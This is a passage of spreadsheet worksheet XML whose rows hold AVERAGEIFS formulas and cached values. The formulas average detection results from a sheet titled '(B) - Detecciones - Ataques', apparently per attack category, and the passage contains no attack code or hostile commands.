        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="AM200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="AN200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="AO200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="AP200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="AQ200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="AR200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.1593487395</v>
      </c>
      <c r="AS200" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="AT200" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="AU200" s="271"/>
      <c r="AV200" s="271"/>
      <c r="AW200" s="271"/>
      <c r="AX200" s="271"/>
      <c r="AY200" s="271"/>
      <c r="AZ200" s="271"/>
      <c r="BA200" s="271"/>
      <c r="BB200" s="271"/>
      <c r="BC200" s="271"/>
      <c r="BD200" s="271"/>
      <c r="BE200" s="271"/>
      <c r="BF200" s="271"/>
      <c r="BG200" s="271"/>
      <c r="BH200" s="271"/>
      <c r="BI200" s="271"/>
      <c r="BJ200" s="271"/>
      <c r="BK200" s="271"/>
      <c r="BL200" s="271"/>
      <c r="BM200" s="271"/>
      <c r="BN200" s="271"/>
      <c r="BO200" s="271"/>
      <c r="BP200" s="271"/>
      <c r="BQ200" s="271"/>
      <c r="BR200" s="271"/>
      <c r="BS200" s="271"/>
      <c r="BT200" s="271"/>
      <c r="BU200" s="271"/>
      <c r="BV200" s="271"/>
      <c r="BW200" s="271"/>
      <c r="BX200" s="271"/>
      <c r="BY200" s="271"/>
      <c r="BZ200" s="271"/>
      <c r="CA200" s="271"/>
      <c r="CB200" s="271"/>
      <c r="CC200" s="271"/>
      <c r="CD200" s="271"/>
      <c r="CE200" s="271"/>
      <c r="CF200" s="271"/>
      <c r="CG200" s="271"/>
      <c r="CH200" s="271"/>
      <c r="CI200" s="271"/>
      <c r="CJ200" s="271"/>
      <c r="CK200" s="271"/>
      <c r="CL200" s="271"/>
      <c r="CM200" s="271"/>
      <c r="CN200" s="271"/>
      <c r="CO200" s="271"/>
      <c r="CP200" s="271"/>
      <c r="CQ200" s="271"/>
      <c r="CR200" s="271"/>
      <c r="CS200" s="271"/>
      <c r="CT200" s="271"/>
      <c r="CU200" s="271"/>
      <c r="CV200" s="271"/>
      <c r="CW200" s="271"/>
      <c r="CX200" s="271"/>
      <c r="CY200" s="271"/>
      <c r="CZ200" s="271"/>
      <c r="DA200" s="271"/>
      <c r="DB200" s="271"/>
      <c r="DC200" s="271"/>
      <c r="DD200" s="271"/>
      <c r="DE200" s="271"/>
      <c r="DF200" s="271"/>
      <c r="DG200" s="271"/>
      <c r="DH200" s="271"/>
      <c r="DI200" s="271"/>
      <c r="DJ200" s="271"/>
      <c r="DK200" s="271"/>
    </row>
    <row r="201">
      <c r="K201" s="173"/>
      <c r="N201" s="173"/>
      <c r="Q201" s="271"/>
      <c r="R201" s="510"/>
      <c r="S201" s="510"/>
      <c r="T201" s="510"/>
      <c r="U201" s="510"/>
      <c r="V201" s="510"/>
      <c r="W201" s="510"/>
      <c r="X201" s="271"/>
      <c r="Y201" s="271"/>
      <c r="Z201" s="271"/>
      <c r="AA201" s="271"/>
      <c r="AB201" s="271"/>
      <c r="AC201" s="271"/>
      <c r="AD201" s="271"/>
      <c r="AE201" s="271"/>
      <c r="AF201" s="271"/>
      <c r="AG201" s="271"/>
      <c r="AH201" s="352" t="s">
        <v>1411</v>
      </c>
      <c r="AI201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AK201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AL201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="AM201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0</v>
      </c>
      <c r="AN201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AO201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AP201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="AQ201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0</v>
      </c>
      <c r="AR201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AS201" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AT201" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="AU201" s="271"/>
      <c r="AV201" s="271"/>
      <c r="AW201" s="271"/>
      <c r="AX201" s="271"/>
      <c r="AY201" s="271"/>
      <c r="AZ201" s="271"/>
      <c r="BA201" s="271"/>
      <c r="BB201" s="271"/>
      <c r="BC201" s="271"/>
      <c r="BD201" s="271"/>
      <c r="BE201" s="271"/>
      <c r="BF201" s="271"/>
      <c r="BG201" s="271"/>
      <c r="BH201" s="271"/>
      <c r="BI201" s="271"/>
      <c r="BJ201" s="271"/>
      <c r="BK201" s="271"/>
      <c r="BL201" s="271"/>
      <c r="BM201" s="271"/>
      <c r="BN201" s="271"/>
      <c r="BO201" s="271"/>
      <c r="BP201" s="271"/>
      <c r="BQ201" s="271"/>
      <c r="BR201" s="271"/>
      <c r="BS201" s="271"/>
      <c r="BT201" s="271"/>
      <c r="BU201" s="271"/>
      <c r="BV201" s="271"/>
      <c r="BW201" s="271"/>
      <c r="BX201" s="271"/>
      <c r="BY201" s="271"/>
      <c r="BZ201" s="271"/>
      <c r="CA201" s="271"/>
      <c r="CB201" s="271"/>
      <c r="CC201" s="271"/>
      <c r="CD201" s="271"/>
      <c r="CE201" s="271"/>
      <c r="CF201" s="271"/>
      <c r="CG201" s="271"/>
      <c r="CH201" s="271"/>
      <c r="CI201" s="271"/>
      <c r="CJ201" s="271"/>
      <c r="CK201" s="271"/>
      <c r="CL201" s="271"/>
      <c r="CM201" s="271"/>
      <c r="CN201" s="271"/>
      <c r="CO201" s="271"/>
      <c r="CP201" s="271"/>
      <c r="CQ201" s="271"/>
      <c r="CR201" s="271"/>
      <c r="CS201" s="271"/>
      <c r="CT201" s="271"/>
      <c r="CU201" s="271"/>
      <c r="CV201" s="271"/>
      <c r="CW201" s="271"/>
      <c r="CX201" s="271"/>
      <c r="CY201" s="271"/>
      <c r="CZ201" s="271"/>
      <c r="DA201" s="271"/>
      <c r="DB201" s="271"/>
      <c r="DC201" s="271"/>
      <c r="DD201" s="271"/>
      <c r="DE201" s="271"/>
      <c r="DF201" s="271"/>
      <c r="DG201" s="271"/>
      <c r="DH201" s="271"/>
      <c r="DI201" s="271"/>
      <c r="DJ201" s="271"/>
      <c r="DK201" s="271"/>
    </row>
    <row r="202">
      <c r="K202" s="173"/>
      <c r="N202" s="173"/>
      <c r="Q202" s="271"/>
      <c r="R202" s="510"/>
      <c r="S202" s="510"/>
      <c r="T202" s="510"/>
      <c r="U202" s="510"/>
      <c r="V202" s="510"/>
      <c r="W202" s="510"/>
      <c r="X202" s="271"/>
      <c r="Y202" s="271"/>
      <c r="Z202" s="271"/>
      <c r="AA202" s="271"/>
      <c r="AB202" s="271"/>
      <c r="AC202" s="271"/>
      <c r="AD202" s="271"/>
      <c r="AE202" s="271"/>
      <c r="AF202" s="271"/>
      <c r="AG202" s="271"/>
      <c r="AH202" s="352" t="s">
        <v>1397</v>
      </c>
      <c r="AI202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS202" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT202" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU202" s="271"/>
      <c r="AV202" s="271"/>
      <c r="AW202" s="271"/>
      <c r="AX202" s="271"/>
      <c r="AY202" s="271"/>
      <c r="AZ202" s="271"/>
      <c r="BA202" s="271"/>
      <c r="BB202" s="271"/>
      <c r="BC202" s="271"/>
      <c r="BD202" s="271"/>
      <c r="BE202" s="271"/>
      <c r="BF202" s="271"/>
      <c r="BG202" s="271"/>
      <c r="BH202" s="271"/>
      <c r="BI202" s="271"/>
      <c r="BJ202" s="271"/>
      <c r="BK202" s="271"/>
      <c r="BL202" s="271"/>
      <c r="BM202" s="271"/>
      <c r="BN202" s="271"/>
      <c r="BO202" s="271"/>
      <c r="BP202" s="271"/>
      <c r="BQ202" s="271"/>
      <c r="BR202" s="271"/>
      <c r="BS202" s="271"/>
      <c r="BT202" s="271"/>
      <c r="BU202" s="271"/>
      <c r="BV202" s="271"/>
      <c r="BW202" s="271"/>
      <c r="BX202" s="271"/>
      <c r="BY202" s="271"/>
      <c r="BZ202" s="271"/>
      <c r="CA202" s="271"/>
      <c r="CB202" s="271"/>
      <c r="CC202" s="271"/>
      <c r="CD202" s="271"/>
      <c r="CE202" s="271"/>
      <c r="CF202" s="271"/>
      <c r="CG202" s="271"/>
      <c r="CH202" s="271"/>
      <c r="CI202" s="271"/>
      <c r="CJ202" s="271"/>
      <c r="CK202" s="271"/>
      <c r="CL202" s="271"/>
      <c r="CM202" s="271"/>
      <c r="CN202" s="271"/>
      <c r="CO202" s="271"/>
      <c r="CP202" s="271"/>
      <c r="CQ202" s="271"/>
      <c r="CR202" s="271"/>
      <c r="CS202" s="271"/>
      <c r="CT202" s="271"/>
      <c r="CU202" s="271"/>
      <c r="CV202" s="271"/>
      <c r="CW202" s="271"/>
      <c r="CX202" s="271"/>
      <c r="CY202" s="271"/>
      <c r="CZ202" s="271"/>
      <c r="DA202" s="271"/>
      <c r="DB202" s="271"/>
      <c r="DC202" s="271"/>
      <c r="DD202" s="271"/>
      <c r="DE202" s="271"/>
      <c r="DF202" s="271"/>
      <c r="DG202" s="271"/>
      <c r="DH202" s="271"/>
      <c r="DI202" s="271"/>
      <c r="DJ202" s="271"/>
      <c r="DK202" s="271"/>
    </row>
    <row r="203">
      <c r="K203" s="173"/>
      <c r="N203" s="173"/>
      <c r="Q203" s="271"/>
      <c r="R203" s="510"/>
      <c r="S203" s="510"/>
      <c r="T203" s="510"/>
      <c r="U203" s="510"/>
      <c r="V203" s="510"/>
      <c r="W203" s="510"/>
      <c r="X203" s="271"/>
      <c r="Y203" s="271"/>
      <c r="Z203" s="271"/>
      <c r="AA203" s="271"/>
      <c r="AB203" s="271"/>
      <c r="AC203" s="271"/>
      <c r="AD203" s="271"/>
      <c r="AE203" s="271"/>
      <c r="AF203" s="271"/>
      <c r="AG203" s="271"/>
      <c r="AH203" s="352" t="s">
        <v>1374</v>
      </c>
      <c r="AI203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS203" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT203" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU203" s="271"/>
      <c r="AV203" s="271"/>
      <c r="AW203" s="271"/>
      <c r="AX203" s="271"/>
      <c r="AY203" s="271"/>
      <c r="AZ203" s="271"/>
      <c r="BA203" s="271"/>
      <c r="BB203" s="271"/>
      <c r="BC203" s="271"/>
      <c r="BD203" s="271"/>
      <c r="BE203" s="271"/>
      <c r="BF203" s="271"/>
      <c r="BG203" s="271"/>
      <c r="BH203" s="271"/>
      <c r="BI203" s="271"/>
      <c r="BJ203" s="271"/>
      <c r="BK203" s="271"/>
      <c r="BL203" s="271"/>
      <c r="BM203" s="271"/>
      <c r="BN203" s="271"/>
      <c r="BO203" s="271"/>
      <c r="BP203" s="271"/>
      <c r="BQ203" s="271"/>
      <c r="BR203" s="271"/>
      <c r="BS203" s="271"/>
      <c r="BT203" s="271"/>
      <c r="BU203" s="271"/>
      <c r="BV203" s="271"/>
      <c r="BW203" s="271"/>
      <c r="BX203" s="271"/>
      <c r="BY203" s="271"/>
      <c r="BZ203" s="271"/>
      <c r="CA203" s="271"/>
      <c r="CB203" s="271"/>
      <c r="CC203" s="271"/>
      <c r="CD203" s="271"/>
      <c r="CE203" s="271"/>
      <c r="CF203" s="271"/>
      <c r="CG203" s="271"/>
      <c r="CH203" s="271"/>
      <c r="CI203" s="271"/>
      <c r="CJ203" s="271"/>
      <c r="CK203" s="271"/>
      <c r="CL203" s="271"/>
      <c r="CM203" s="271"/>
      <c r="CN203" s="271"/>
      <c r="CO203" s="271"/>
      <c r="CP203" s="271"/>
      <c r="CQ203" s="271"/>
      <c r="CR203" s="271"/>
      <c r="CS203" s="271"/>
      <c r="CT203" s="271"/>
      <c r="CU203" s="271"/>
      <c r="CV203" s="271"/>
      <c r="CW203" s="271"/>
      <c r="CX203" s="271"/>
      <c r="CY203" s="271"/>
      <c r="CZ203" s="271"/>
      <c r="DA203" s="271"/>
      <c r="DB203" s="271"/>
      <c r="DC203" s="271"/>
      <c r="DD203" s="271"/>
      <c r="DE203" s="271"/>
      <c r="DF203" s="271"/>
      <c r="DG203" s="271"/>
      <c r="DH203" s="271"/>
      <c r="DI203" s="271"/>
      <c r="DJ203" s="271"/>
      <c r="DK203" s="271"/>
    </row>
    <row r="204">
      <c r="K204" s="173"/>
      <c r="N204" s="173"/>
      <c r="Q204" s="271"/>
      <c r="R204" s="510"/>
      <c r="S204" s="510"/>
      <c r="T204" s="510"/>
      <c r="U204" s="510"/>
      <c r="V204" s="510"/>
      <c r="W204" s="510"/>
      <c r="X204" s="271"/>
      <c r="Y204" s="271"/>
      <c r="Z204" s="271"/>
      <c r="AA204" s="271"/>
      <c r="AB204" s="271"/>
      <c r="AC204" s="271"/>
      <c r="AD204" s="271"/>
      <c r="AE204" s="271"/>
      <c r="AF204" s="271"/>
      <c r="AG204" s="271"/>
      <c r="AH204" s="352" t="s">
        <v>677</v>
      </c>
      <c r="AI204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="AL204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="AM204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AN204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AO204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="AP204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AR204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="AS204" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="AT204" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>1</v>
      </c>
      <c r="AU204" s="271"/>
      <c r="AV204" s="271"/>
      <c r="AW204" s="271"/>
      <c r="AX204" s="271"/>
      <c r="AY204" s="271"/>
      <c r="AZ204" s="271"/>
      <c r="BA204" s="271"/>
      <c r="BB204" s="271"/>
      <c r="BC204" s="271"/>
      <c r="BD204" s="271"/>
      <c r="BE204" s="271"/>
      <c r="BF204" s="271"/>
      <c r="BG204" s="271"/>
      <c r="BH204" s="271"/>
      <c r="BI204" s="271"/>
      <c r="BJ204" s="271"/>
      <c r="BK204" s="271"/>
      <c r="BL204" s="271"/>
      <c r="BM204" s="271"/>
      <c r="BN204" s="271"/>
      <c r="BO204" s="271"/>
      <c r="BP204" s="271"/>
      <c r="BQ204" s="271"/>
      <c r="BR204" s="271"/>
      <c r="BS204" s="271"/>
      <c r="BT204" s="271"/>
      <c r="BU204" s="271"/>
      <c r="BV204" s="271"/>
      <c r="BW204" s="271"/>
      <c r="BX204" s="271"/>
      <c r="BY204" s="271"/>
      <c r="BZ204" s="271"/>
      <c r="CA204" s="271"/>
      <c r="CB204" s="271"/>
      <c r="CC204" s="271"/>
      <c r="CD204" s="271"/>
      <c r="CE204" s="271"/>
      <c r="CF204" s="271"/>
      <c r="CG204" s="271"/>
      <c r="CH204" s="271"/>
      <c r="CI204" s="271"/>
      <c r="CJ204" s="271"/>
      <c r="CK204" s="271"/>
      <c r="CL204" s="271"/>
      <c r="CM204" s="271"/>
      <c r="CN204" s="271"/>
      <c r="CO204" s="271"/>
      <c r="CP204" s="271"/>
      <c r="CQ204" s="271"/>
      <c r="CR204" s="271"/>
      <c r="CS204" s="271"/>
      <c r="CT204" s="271"/>
      <c r="CU204" s="271"/>
      <c r="CV204" s="271"/>
      <c r="CW204" s="271"/>
      <c r="CX204" s="271"/>
      <c r="CY204" s="271"/>
      <c r="CZ204" s="271"/>
      <c r="DA204" s="271"/>
      <c r="DB204" s="271"/>
      <c r="DC204" s="271"/>
      <c r="DD204" s="271"/>
      <c r="DE204" s="271"/>
      <c r="DF204" s="271"/>
      <c r="DG204" s="271"/>
      <c r="DH204" s="271"/>
      <c r="DI204" s="271"/>
      <c r="DJ204" s="271"/>
      <c r="DK204" s="271"/>
    </row>
    <row r="205">
      <c r="K205" s="173"/>
      <c r="N205" s="173"/>
      <c r="Q205" s="271"/>
      <c r="R205" s="510"/>
      <c r="S205" s="510"/>
      <c r="T205" s="510"/>
      <c r="U205" s="510"/>
      <c r="V205" s="510"/>
      <c r="W205" s="510"/>
      <c r="X205" s="271"/>
      <c r="Y205" s="271"/>
      <c r="Z205" s="271"/>
      <c r="AA205" s="271"/>
      <c r="AB205" s="271"/>
      <c r="AC205" s="271"/>
      <c r="AD205" s="271"/>
      <c r="AE205" s="271"/>
      <c r="AF205" s="271"/>
      <c r="AG205" s="271"/>
      <c r="AH205" s="352" t="s">
        <v>790</v>
      </c>
      <c r="AI205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS205" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT205" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU205" s="271"/>
      <c r="AV205" s="271"/>
      <c r="AW205" s="271"/>
      <c r="AX205" s="271"/>
      <c r="AY205" s="271"/>
      <c r="AZ205" s="271"/>
      <c r="BA205" s="271"/>
      <c r="BB205" s="271"/>
      <c r="BC205" s="271"/>
      <c r="BD205" s="271"/>
      <c r="BE205" s="271"/>
      <c r="BF205" s="271"/>
      <c r="BG205" s="271"/>
      <c r="BH205" s="271"/>
      <c r="BI205" s="271"/>
      <c r="BJ205" s="271"/>
      <c r="BK205" s="271"/>
      <c r="BL205" s="271"/>
      <c r="BM205" s="271"/>
      <c r="BN205" s="271"/>
      <c r="BO205" s="271"/>
      <c r="BP205" s="271"/>
      <c r="BQ205" s="271"/>
      <c r="BR205" s="271"/>
      <c r="BS205" s="271"/>
      <c r="BT205" s="271"/>
      <c r="BU205" s="271"/>
      <c r="BV205" s="271"/>
      <c r="BW205" s="271"/>
      <c r="BX205" s="271"/>
      <c r="BY205" s="271"/>
      <c r="BZ205" s="271"/>
      <c r="CA205" s="271"/>
      <c r="CB205" s="271"/>
      <c r="CC205" s="271"/>
      <c r="CD205" s="271"/>
      <c r="CE205" s="271"/>
      <c r="CF205" s="271"/>
      <c r="CG205" s="271"/>
      <c r="CH205" s="271"/>
      <c r="CI205" s="271"/>
      <c r="CJ205" s="271"/>
      <c r="CK205" s="271"/>
      <c r="CL205" s="271"/>
      <c r="CM205" s="271"/>
      <c r="CN205" s="271"/>
      <c r="CO205" s="271"/>
      <c r="CP205" s="271"/>
      <c r="CQ205" s="271"/>
      <c r="CR205" s="271"/>
      <c r="CS205" s="271"/>
      <c r="CT205" s="271"/>
      <c r="CU205" s="271"/>
      <c r="CV205" s="271"/>
      <c r="CW205" s="271"/>
      <c r="CX205" s="271"/>
      <c r="CY205" s="271"/>
      <c r="CZ205" s="271"/>
      <c r="DA205" s="271"/>
      <c r="DB205" s="271"/>
      <c r="DC205" s="271"/>
      <c r="DD205" s="271"/>
      <c r="DE205" s="271"/>
      <c r="DF205" s="271"/>
      <c r="DG205" s="271"/>
      <c r="DH205" s="271"/>
      <c r="DI205" s="271"/>
      <c r="DJ205" s="271"/>
      <c r="DK205" s="271"/>
    </row>
    <row r="206">
      <c r="K206" s="173"/>
      <c r="N206" s="173"/>
      <c r="Q206" s="271"/>
      <c r="R206" s="510"/>
      <c r="S206" s="510"/>
      <c r="T206" s="510"/>
      <c r="U206" s="510"/>
      <c r="V206" s="510"/>
      <c r="W206" s="510"/>
      <c r="X206" s="271"/>
      <c r="Y206" s="271"/>
      <c r="Z206" s="271"/>
      <c r="AA206" s="271"/>
      <c r="AB206" s="271"/>
      <c r="AC206" s="271"/>
      <c r="AD206" s="271"/>
      <c r="AE206" s="271"/>
      <c r="AF206" s="271"/>
      <c r="AG206" s="271"/>
      <c r="AH206" s="352" t="s">
        <v>262</v>
      </c>
      <c r="AI206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="AJ206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>1</v>
      </c>
      <c r="AK206" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
